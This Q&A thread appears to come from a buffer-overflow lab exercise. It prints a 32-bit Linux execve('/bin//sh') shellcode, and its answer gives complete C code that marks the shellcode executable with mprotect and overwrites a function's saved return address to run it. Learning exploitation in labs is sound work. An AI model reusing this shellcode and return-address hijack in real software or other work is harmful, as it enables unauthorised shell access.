# change the return address to point to shellcode

Tags: c, buffer, stack-overflow, buffer-overflow, exploit

Im using linux and I have c program, I would like to change the return address to point to my shellcode, im unable to do it.

Here is my shellcode

```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
```

Here is my c program

```
int global_value = 0;
void bang(int val)
{
if (global_value == cookie) {
   printf("Bang!: You set global_value to 0x%x\n", global_value);
   validate(2);
 } else
   printf("Misfire: global_value = 0x%x\n", global_value);
   exit(0);
 }
```

Comment: what are you asking for? Do you ask how to set pointer to this code?

Comment: show your code about `validate(size_t)`, is it use `strcpy()` to finish stack over flow attack?

Comment: im trying to change the return address to shellcode.

Comment: Where is your shellcode located ? Show more code.

Comment: @Michael Walz, my shellcode can be located any where in the memory.if you can see above you will see my shellcode. give me example with linux gdb debugger how to point the return address of the function to my shellcode.

Answer (score 1):

i think you should not use of **exit(0)** or everything like it. here is my attempt. i hope it be useful!

```
    // compile : gcc -m32 test.c -o test
    // run : ./test

    #include <sys/mman.h >
    #define PAGE_SIZE 4096U

    char shellcode[] =
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80";

    int global_value = 0;

    void bang(int val)
    {
        char **ptr = (char **)&val-1;
        mprotect((void *)((unsigned int)shellcode & ~(PAGE_SIZE - 1)), 2 * PAGE_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC);
        *ptr = shellcode;

    /*if (global_value == cookie) {
       printf("Bang!: You set global_value to 0x%x\n", global_value);
       validate(2);
     } else
       printf("Misfire: global_value = 0x%x\n", global_value);*/
      // exit(0);
     }

    int main() {
        bang(0);
        printf("this should not be executed!\n");
        return 0;
    }
```